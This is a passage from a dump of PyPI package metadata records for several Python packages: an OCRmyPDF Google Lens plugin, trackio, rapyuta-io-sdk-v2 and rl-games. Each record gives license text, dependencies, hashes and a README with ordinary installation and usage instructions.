- Requires network access and uploads page images to Google servers.
- OCR quality depends on Lens behavior and can vary by document type.
- `generate_pdf()` in the plugin is not implemented; OCR output is produced through hOCR/text path.
## Credits
- [chrome-lens-ocr](https://github.com/dimdenGD/chrome-lens-ocr) for protobuf/API reverse-engineering ideas.
- [OCRmyPDF-AppleOCR](https://github.com/mkyt/OCRmyPDF-AppleOCR) for plugin architecture inspiration.
## License
MIT
| text/markdown | null | Victor Sakovich <atlantos@gmail.com> | null | null | MIT License
Copyright (c) 2026 Victor Sakovich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| ocrmypdf, ocr, google-lens, pdf, plugin | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Image Recognition",
"Topic :: Text Processing :: Indexing"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"ocrmypdf>=16.0.0",
"requests",
"Pillow",
"packaging",
"pytest; extra == \"test\"",
"pytest-cov; extra == \"test\""
] | [] | [] | [] | [
"Homepage, https://github.com/atlantos/OCRmyPDF-ChromeLens-Ocr",
"Bug Tracker, https://github.com/atlantos/OCRmyPDF-ChromeLens-Ocr/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:23:08.040308 | ocrmypdf_chromelens_ocr-1.0.7.tar.gz | 24,203 | 9e/a5/3114b238ae0414afa994c7598e6b45509e2f1dbf2c05f4702f3cf8b5b797/ocrmypdf_chromelens_ocr-1.0.7.tar.gz | source | sdist | null | false | 35e578fae162e32defd3a2e1895c7a9a | 1ca7b14748b27457a68b166a70badebf891d077dd47de036b521090633d39c80 | 9ea53114b238ae0414afa994c7598e6b45509e2f1dbf2c05f4702f3cf8b5b797 | null | [
"LICENSE"
] | 227 |
2.4 | trackio | 0.16.1 | A lightweight, local-first, and free experiment tracking library built on top of Hugging Face Datasets and Spaces. | <p align="center">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="trackio/assets/trackio_logo_type_dark_transparent.png">
<source media="(prefers-color-scheme: light)" srcset="trackio/assets/trackio_logo_type_light_transparent.png">
<img width="75%" alt="Trackio Logo" src="trackio/assets/trackio_logo_type_light_transparent.png">
</picture>
</p>
<div align="center">
[](https://github.com/gradio-app/trackio/actions/workflows/test.yml)
[](https://pypi.org/project/trackio/)
[](https://pypi.org/project/trackio/)

[](https://twitter.com/trackioapp)
</div>
`trackio` is a lightweight, free experiment tracking Python library built by Hugging Face 🤗.

- **API compatible** with `wandb.init`, `wandb.log`, and `wandb.finish`. Drop-in replacement: just
```python
import trackio as wandb
```
and keep your existing logging code.
- **Local-first** design: dashboard runs locally by default. You can also host it on Spaces by specifying a `space_id` in `trackio.init()`.
- Persists logs in a Sqlite database locally (or, if you provide a `space_id`, in a private Hugging Face Dataset)
- Visualize experiments with a Gradio dashboard locally (or, if you provide a `space_id`, on Hugging Face Spaces)
- **LLM-friendly**: Built with autonomous ML experiments in mind, Trackio includes a CLI for programmatic access and a Python API for run management, making it easy for LLMs to log metrics and query experiment data.
- Everything here, including hosting on Hugging Face, is **free**!
Trackio is designed to be lightweight (the core codebase is <5,000 lines of Python code), not fully-featured. It is designed in an extensible way and written entirely in Python so that developers can easily fork the repository and add functionality that they care about.
## Installation
Trackio requires [Python 3.10 or higher](https://www.python.org/downloads/). Install with `pip`:
```bash
pip install trackio
```
or with `uv`:
```bash
uv pip install trackio
```
## Usage
To get started, you can run a simple example that logs some fake training metrics:
```python
import trackio
import random
import time
runs = 3
epochs = 8
for run in range(runs):
trackio.init(
project="my-project",
config={"epochs": epochs, "learning_rate": 0.001, "batch_size": 64}
)
for epoch in range(epochs):
train_loss = random.uniform(0.2, 1.0)
train_acc = random.uniform(0.6, 0.95)
val_loss = train_loss - random.uniform(0.01, 0.1)
val_acc = train_acc + random.uniform(0.01, 0.05)
trackio.log({
"epoch": epoch,
"train_loss": train_loss,
"train_accuracy": train_acc,
"val_loss": val_loss,
"val_accuracy": val_acc
})
time.sleep(0.2)
trackio.finish()
```
Running the above will print to the terminal instructions on launching the dashboard.
The usage of `trackio` is designed to be identical to `wandb` in most cases, so you can easily switch between the two libraries.
```py
import trackio as wandb
```
## Dashboard
You can launch the dashboard by running in your terminal:
```bash
trackio show
```
or, in Python:
```py
import trackio
trackio.show()
```
You can also provide an optional `project` name as the argument to load a specific project directly:
```bash
trackio show --project "my-project"
```
or, in Python:
```py
import trackio
trackio.show(project="my-project")
```
## Deploying to Hugging Face Spaces
When calling `trackio.init()`, by default the service will run locally and store project data on the local machine.
But if you pass a `space_id` to `init`, like:
```py
trackio.init(project="my-project", space_id="orgname/space_id")
```
or
```py
trackio.init(project="my-project", space_id="username/space_id")
```
it will use an existing or automatically deploy a new Hugging Face Space as needed. You should be logged in with the `huggingface-cli` locally and your token should have write permissions to create the Space.
## Syncing Offline Projects to Spaces
If you've been tracking experiments locally and want to move them to Hugging Face Spaces for sharing or collaboration, use the `sync` function:
```py
import trackio
trackio.sync(project="my-project", space_id="username/space_id")
```
This uploads your local project database to a new or existing Space. The Space will display all your logged experiments and metrics.
**Example workflow:**
```py
import trackio
# Start tracking locally
trackio.init(project="my-project", config={"lr": 0.001})
trackio.log({"loss": 0.5})
trackio.finish()
# Later, sync to Spaces
trackio.sync(project="my-project", space_id="username/my-experiments")
```
## Embedding a Trackio Dashboard
One of the reasons we created `trackio` was to make it easy to embed live dashboards on websites, blog posts, or anywhere else you can embed a website.

If you are hosting your Trackio dashboard on Spaces, then you can embed the url of that Space as an IFrame. You can even use query parameters to only specific projects and/or metrics, e.g.
```html
<iframe src="https://abidlabs-trackio-1234.hf.space/?project=my-project&metrics=train_loss,train_accuracy&sidebar=hidden" style="width:1600px; height:500px; border:0;">
```
Supported query parameters:
- `project`: (string) Filter the dashboard to show only a specific project
- `metrics`: (comma-separated list) Filter the dashboard to show only specific metrics, e.g. `train_loss,train_accuracy`
- `sidebar`: (string: one of "hidden" or "collapsed"). If "hidden", then the sidebar will not be visible. If "collapsed", the sidebar will be in a collapsed state initially but the user will be able to open it. Otherwise, by default, the sidebar is shown in an open and visible state.
- `footer`: (string: "false"). When set to "false", hides the Gradio footer. By default, the footer is visible.
- `xmin`: (number) Set the initial minimum value for the x-axis limits across all metric plots.
- `xmax`: (number) Set the initial maximum value for the x-axis limits across all metric plots.
- `smoothing`: (number) Set the initial value of the smoothing slider (0-20, where 0 = no smoothing).
## Examples
To get started and see basic examples of usage, see these files:
- [Basic example of logging metrics locally](https://github.com/gradio-app/trackio/blob/main/examples/fake-training.py)
- [Persisting metrics in a Hugging Face Dataset](https://github.com/gradio-app/trackio/blob/main/examples/persist-dataset.py)
- [Deploying the dashboard to Spaces](https://github.com/gradio-app/trackio/blob/main/examples/deploy-on-spaces.py)
## Note: Trackio is in Beta (DB Schema May Change)
Note that Trackio is in pre-release right now and we may release breaking changes. In particular, the schema of the Trackio sqlite database may change, which may require migrating or deleting existing database files (located by default at: `~/.cache/huggingface/trackio`).
Since Trackio is in beta, your feedback is welcome! Please create issues with bug reports or feature requests.
## License
MIT License
## Documentation
The complete documentation and API reference for each version of Trackio can be found at: https://huggingface.co/docs/trackio/index
## Contribute
We welcome contributions to Trackio! Whether you're fixing bugs, adding features, or improving documentation, your contributions help make Trackio better for the entire machine learning community.
<p align="center">
<img src="https://contrib.rocks/image?repo=gradio-app/trackio" />
</p>
To start contributing, see our [Contributing Guide](CONTRIBUTING.md).
### Development Setup
To set up Trackio for development, clone this repo and run:
```bash
pip install -e ".[dev,tensorboard]"
```
## Pronunciation
Trackio is pronounced TRACK-yo, as in "track yo' experiments"
| text/markdown | null | Abubakar Abid <abubakar@huggingface.co>, Zach Nation <zach@huggingface.co> | null | null | null | null | [
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"gradio[oauth]<7.0.0,>=6.6.0",
"huggingface-hub<2.0.0",
"numpy<3.0.0",
"orjson<4.0.0,>=3.0",
"pandas<3.0.0",
"pillow<12.0.0",
"plotly<7.0.0,>=6.0.0",
"pydub<1.0.0",
"tomli>=2.0.0; python_version < \"3.11\"",
"playwright<2.0.0,>=1.40.0; extra == \"dev\"",
"pytest-playwright<1.0.0,>=0.7.0; extra == \"dev\"",
"pytest<9.0.0,>=8.0.0; extra == \"dev\"",
"ruff==0.9.3; extra == \"dev\"",
"nvidia-ml-py>=12.0.0; extra == \"gpu\"",
"pyarrow>=21.0; extra == \"spaces\"",
"tbparse==0.0.9; extra == \"tensorboard\"",
"tensorboardx<3.0.0,>=2.0.0; extra == \"tensorboard\""
] | [] | [] | [] | [
"homepage, https://github.com/gradio-app/trackio",
"repository, https://github.com/gradio-app/trackio"
] | twine/6.2.0 CPython/3.10.12 | 2026-02-20T06:21:04.310392 | trackio-0.16.1-py3-none-any.whl | 1,005,881 | a1/09/1f8c23c8b1dc35fc8d2d25ff2bb61728495b6374d9a89f130632eaba90b6/trackio-0.16.1-py3-none-any.whl | py3 | bdist_wheel | null | false | 6d5320b32b56d4630fb3b40b6bd1bf8f | a5e670331296f57f34044552ba8da396247ab6df4be3895e55811bdf75375687 | a1091f8c23c8b1dc35fc8d2d25ff2bb61728495b6374d9a89f130632eaba90b6 | null | [
"LICENSE"
] | 1,745 |
2.4 | rapyuta-io-sdk-v2 | 0.4.2 | Python SDK for rapyuta.io v2 APIs | <p align="center">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="./assets/v2sdk-logo-dark.png">
<img alt="Telemetry Pipeline Logo" src="./assets/v2sdk-logo-light.png">
</picture>
</p>
# rapyuta.io SDK v2
rapyuta.io SDK v2 provides a comprehensive set of tools and functionalities to interact with the rapyuta.io platform.
## Installation
```bash
pip install rapyuta-io-sdk-v2
```
## Usage
To use the SDK, you need to configure it with your rapyuta.io credentials.
### From a Configuration File
You can create a `Configuration` object from a JSON file.
```python
from rapyuta_io_sdk_v2.config import Configuration, Client
config = Configuration.from_file("/path/to/config.json")
client = Client(config)
```
### Using `email` and `password`
```python
from rapyuta_io_sdk_v2.config import Configuration, Client
config = Configuration(organization_guid="ORGANIZATION_GUID")
client = Client(config)
client.login(email="EMAIL", password="PASSWORD")
```
You are now set to invoke various methods on the `client` object.
For example, this is how you can list projects.
```python
projects = client.list_projects()
print(projects)
```
## Contributing
We welcome contributions. Please read our [contribution guidelines](CONTRIBUTING.md) to get started. | text/markdown | null | null | null | null | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.27.2",
"pydantic-settings>=2.7.1",
"python-benedict>=0.30",
"pyyaml>=6.0.2"
] | [] | [] | [] | [] | uv/0.4.22 | 2026-02-20T06:19:29.055851 | rapyuta_io_sdk_v2-0.4.2.tar.gz | 123,124 | d8/99/b7b2ae80254eb676364e93cd772f106842265138f85ac501dc3051a79c0a/rapyuta_io_sdk_v2-0.4.2.tar.gz | source | sdist | null | false | 16a622b4764e2afd07cf310bb9436cba | 95b9e282787108afe61f3f5631b9d26019826eecd917b1f9e39c67a921d02655 | d899b7b2ae80254eb676364e93cd772f106842265138f85ac501dc3051a79c0a | null | [] | 422 |
2.4 | rl-games | 1.6.5 | High-performance Reinforcement Learning framework for games and robotics | # RL Games: High performance RL library
## Discord Channel Link
* https://discord.gg/hnYRq7DsQh
## Papers and related links
* Isaac Gym: High Performance GPU-Based Physics Simulation For Robot Learning: https://arxiv.org/abs/2108.10470
* DeXtreme: Transfer of Agile In-Hand Manipulation from Simulation to Reality: https://dextreme.org/ https://arxiv.org/abs/2210.13702
* Transferring Dexterous Manipulation from GPU Simulation to a Remote Real-World TriFinger: https://s2r2-ig.github.io/ https://arxiv.org/abs/2108.09779
* Is Independent Learning All You Need in the StarCraft Multi-Agent Challenge? <https://arxiv.org/abs/2011.09533>
* Superfast Adversarial Motion Priors (AMP) implementation: https://twitter.com/xbpeng4/status/1506317490766303235 https://github.com/NVIDIA-Omniverse/IsaacGymEnvs
* OSCAR: Data-Driven Operational Space Control for Adaptive and Robust Robot Manipulation: https://cremebrule.github.io/oscar-web/ https://arxiv.org/abs/2110.00704
* EnvPool: A Highly Parallel Reinforcement Learning Environment Execution Engine: https://arxiv.org/abs/2206.10558 and https://github.com/sail-sg/envpool
* TimeChamber: A Massively Parallel Large Scale Self-Play Framework: https://github.com/inspirai/TimeChamber
## Some results on the different environments
* [NVIDIA Isaac Gym](docs/ISAAC_GYM.md)




* [Dextreme](https://dextreme.org/)

* [DexPBT](https://sites.google.com/view/dexpbt)

* [Starcraft 2 Multi Agents](docs/SMAC.md)
* [BRAX](docs/BRAX.md)
* [Mujoco Envpool](docs/MUJOCO_ENVPOOL.md)
* [DeepMind Envpool](docs/DEEPMIND_ENVPOOL.md)
* [Atari Envpool](docs/ATARI_ENVPOOL.md)
* [Random Envs](docs/OTHER.md)
Implemented in Pytorch:
* PPO with the support of asymmetric actor-critic variant
* Support of end-to-end GPU accelerated training pipeline with Isaac Gym and Brax
* Masked actions support
* Multi-agent training, decentralized and centralized critic variants
* Self-play
Implemented in Tensorflow 1.x (was removed in this version):
* Rainbow DQN
* A2C
* PPO
## Quickstart: Colab in the Cloud
Explore RL Games quick and easily in colab notebooks:
* [Mujoco training](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/mujoco_envpool_training.ipynb) Mujoco envpool training example.
* [Brax training](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/brax_training.ipynb) Brax training example, with keeping all the observations and actions on GPU.
* [Onnx discrete space export example with Cartpole](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/train_and_export_onnx_example_discrete.ipynb) envpool training example.
* [Onnx continuous space export example with Pendulum](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/train_and_export_onnx_example_continuous.ipynb) envpool training example.
* [Onnx continuous space with LSTM export example with Pendulum](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/train_and_export_onnx_example_lstm_continuous.ipynb) envpool training example.
## Installation
For maximum training performance a preliminary installation of Pytorch 2.2 or newer with CUDA 12.1 or newer is highly recommended:
```bash
pip3 install torch torchvision
```
Then:
```bash
pip install rl-games
```
Or clone the repo and install the latest version from source :
```bash
pip install -e .
```
To run CPU-based environments either envpool if supported or Ray are required ```pip install envpool``` or ```pip install ray```
To run Mujoco, Atari games or Box2d based environments training they need to be additionally installed with ```pip install gym[mujoco]```, ```pip install gym[atari]``` or ```pip install gym[box2d]``` respectively.
To run Atari also ```pip install opencv-python``` is required. For modern Gymnasium/ALE Atari environments, install ```pip install ale-py```. In addition installation of envpool for maximum simulation and training performance of Mujoco and Atari environments is highly recommended: ```pip install envpool```
### EnvPool + NumPy 2+ Incompatibility
**IMPORTANT:** If using EnvPool, you **must** use NumPy 1.x. NumPy 2.0+ is **NOT compatible** with EnvPool and will cause training failures ([see issue](https://github.com/sail-sg/envpool/issues/312)).
Downgrade to NumPy 1.26.4:
```bash
pip uninstall numpy
pip install numpy==1.26.4
```
## Citing
If you use rl-games in your research please use the following citation:
```bibtex
@misc{rl-games2021,
title = {rl-games: A High-performance Framework for Reinforcement Learning},
author = {Makoviichuk, Denys and Makoviychuk, Viktor},
month = {May},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/Denys88/rl_games}},
}
```
## Development setup
```bash
poetry install
# install cuda related dependencies
poetry run pip install torch torchvision
```
## Training
**NVIDIA Isaac Gym**
Download and follow the installation instructions of Isaac Gym: https://developer.nvidia.com/isaac-gym
And IsaacGymEnvs: https://github.com/NVIDIA-Omniverse/IsaacGymEnvs
*Ant*
```bash
python train.py task=Ant headless=True
python train.py task=Ant test=True checkpoint=nn/Ant.pth num_envs=100
```
*Humanoid*
```bash
python train.py task=Humanoid headless=True
python train.py task=Humanoid test=True checkpoint=nn/Humanoid.pth num_envs=100
```
*Shadow Hand block orientation task*
```python train.py task=ShadowHand headless=True```
```python train.py task=ShadowHand test=True checkpoint=nn/ShadowHand.pth num_envs=100```
**Other**
*Atari Pong*
```bash
python runner.py --train --file rl_games/configs/atari/ppo_pong_envpool.yaml
python runner.py --play --file rl_games/configs/atari/ppo_pong_envpool.yaml --checkpoint nn/Pong-v5_envpool.pth
```
Or with poetry:
```bash
poetry install -E atari
poetry run python runner.py --train --file rl_games/configs/atari/ppo_pong.yaml
poetry run python runner.py --play --file rl_games/configs/atari/ppo_pong.yaml --checkpoint nn/PongNoFrameskip.pth
```
*Brax Ant*
```bash
pip install -U "jax[cuda12]"
pip install brax
python runner.py --train --file rl_games/configs/brax/ppo_ant.yaml
python runner.py --play --file rl_games/configs/brax/ppo_ant.yaml --checkpoint runs/Ant_brax/nn/Ant_brax.pth
```
## Experiment tracking
rl_games support experiment tracking with [Weights and Biases](https://wandb.ai).
```bash
python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --track
WANDB_API_KEY=xxxx python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --track
python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --wandb-project-name rl-games-special-test --track
python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --wandb-project-name rl-games-special-test -wandb-entity openrlbenchmark --track
```
## Multi GPU
We use `torchrun` to orchestrate any multi-gpu runs.
```bash
torchrun --standalone --nnodes=1 --nproc_per_node=2 runner.py --train --file rl_games/configs/ppo_cartpole.yaml
```
## Config Parameters
| Field | Example Value | Default | Description |
| ---------------------- | ------------------------- | ------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| seed | 8 | None | Seed for pytorch, numpy etc. |
| algo | | | Algorithm block. |
| name | a2c_continuous | None | Algorithm name. Possible values are: sac, a2c_discrete, a2c_continuous |
| model | | | Model block. |
| name | continuous_a2c_logstd | None | Possible values: continuous_a2c ( expects sigma to be (0, +inf), continuous_a2c_logstd ( expects sigma to be (-inf, +inf), a2c_discrete, a2c_multi_discrete |
| network | | | Network description. |
| name | actor_critic | | Possible values: actor_critic or soft_actor_critic. |
| separate | False | | Whether use or not separate network with same same architecture for critic. In almost all cases if you normalize value it is better to have it False |
| space | | | Network space |
| continuous | | | continuous or discrete |
| mu_activation | None | | Activation for mu. In almost all cases None works the best, but we may try tanh. |
| sigma_activation | None | | Activation for sigma. Will be threated as log(sigma) or sigma depending on model. |
| mu_init | | | Initializer for mu. |
| name | default | | |
| sigma_init | | | Initializer for sigma. if you are using logstd model good value is 0. |
| name | const_initializer | | |
| val | 0 | | |
| fixed_sigma | True | | If true then sigma vector doesn't depend on input. |
| cnn | | | Convolution block. |
| type | conv2d | | Type: right now two types supported: conv2d or conv1d |
| activation | elu | | activation between conv layers. |
| initializer | | | Initialier. I took some names from the tensorflow. |
| name | glorot_normal_initializer | | Initializer name |
| gain | 1.4142 | | Additional parameter. |
| convs | | | Convolution layers. Same parameters as we have in torch. |
| filters | 32 | | Number of filters. |
| kernel_size | 8 | | Kernel size. |
| strides | 4 | | Strides |
| padding | 0 | | Padding |
| filters | 64 | | Next convolution layer info. |
| kernel_size | 4 | | |
| strides | 2 | | |
| padding | 0 | | |
| filters | 64 | | |
| kernel_size | 3 | | |
| strides | 1 | | |
| padding | 0 | |
| mlp | | | MLP Block. Convolution is supported too. See other config examples. |
| units | | | Array of sizes of the MLP layers, for example: [512, 256, 128] |
| d2rl | False | | Use d2rl architecture from https://arxiv.org/abs/2010.09163. |
| activation | elu | | Activations between dense layers. |
| initializer | | | Initializer. |
| name | default | | Initializer name. |
| rnn | | | RNN block. |
| name | lstm | | RNN Layer name. lstm and gru are supported. |
| units | 256 | | Number of units. |
| layers | 1 | | Number of layers |
| before_mlp | False | False | Apply rnn before mlp block or not. |
| config | | | RL Config block. |
| reward_shaper | | | Reward Shaper. Can apply simple transformations. |
| min_val | -1 | | You can apply min_val, max_val, scale and shift. |
| scale_value | 0.1 | 1 | |
| normalize_advantage | True | True | Normalize Advantage. |
| gamma | 0.995 | | Reward Discount |
| tau | 0.95 | | Lambda for GAE. Called tau by mistake long time ago because lambda is keyword in python :( |
| learning_rate | 3e-4 | | Learning rate. |
| name | walker | | Name which will be used in tensorboard. |
| save_best_after | 10 | | How many epochs to wait before start saving checkpoint with best score. |
| score_to_win | 300 | | If score is >=value then this value training will stop. |
| grad_norm | 1.5 | | Grad norm. Applied if truncate_grads is True. Good value is in (1.0, 10.0) |
| entropy_coef | 0 | | Entropy coefficient. Good value for continuous space is 0. For discrete is 0.02 |
| truncate_grads | True | | Apply truncate grads or not. It stabilizes training. |
| env_name | BipedalWalker-v3 | | Envinronment name. |
| e_clip | 0.2 | | clip parameter for ppo loss. |
| clip_value | False | | Apply clip to the value loss. If you are using normalize_value you don't need it. |
| num_actors | 16 | | Number of running actors/environments. |
| horizon_length | 4096 | | Horizon length per each actor. Total number of steps will be num_actors*horizon_length * num_agents (if env is not MA num_agents==1). |
| minibatch_size | 8192 | | Minibatch size. Total number number of steps must be divisible by minibatch size. |
| minibatch_size_per_env | 8 | | Minibatch size per env. If specified will overwrite total number number the default minibatch size with minibatch_size_per_env * nume_envs value. |
| mini_epochs | 4 | | Number of miniepochs. Good value is in [1,10] |
| critic_coef | 2 | | Critic coef. by default critic_loss = critic_coef * 1/2 * MSE. |
| lr_schedule | adaptive | None | Scheduler type. Could be None, linear or adaptive. Adaptive is the best for continuous control tasks. Learning rate is changed changed every miniepoch |
| kl_threshold | 0.008 | | KL threshould for adaptive schedule. if KL < kl_threshold/2 lr = lr * 1.5 and opposite. |
| normalize_input | True | | Apply running mean std for input. |
| bounds_loss_coef | 0.0 | | Coefficient to the auxiary loss for continuous space. |
| max_epochs | 10000 | | Maximum number of epochs to run. |
| max_frames | 5000000 | | Maximum number of frames (env steps) to run. |
| normalize_value | True | | Use value running mean std normalization. |
| use_diagnostics | True | | Adds more information into the tensorboard. |
| value_bootstrap | True | | Bootstraping value when episode is finished. Very useful for different locomotion envs. |
| bound_loss_type | regularisation | None | Adds aux loss for continuous case. 'regularisation' is the sum of sqaured actions. 'bound' is the sum of actions higher than 1.1. |
| bounds_loss_coef | 0.0005 | 0 | Regularisation coefficient |
| use_smooth_clamp | False | | Use smooth clamp instead of regular for cliping |
| zero_rnn_on_done | False | True | If False RNN internal state is not reset (set to 0) when an environment is rest. Could improve training in some cases, for example when domain randomization is on |
| player | | | Player configuration block. |
| render | True | False | Render environment |
| deterministic | True | True | Use deterministic policy ( argmax or mu) or stochastic. |
| use_vecenv | True | False | Use vecenv to create environment for player |
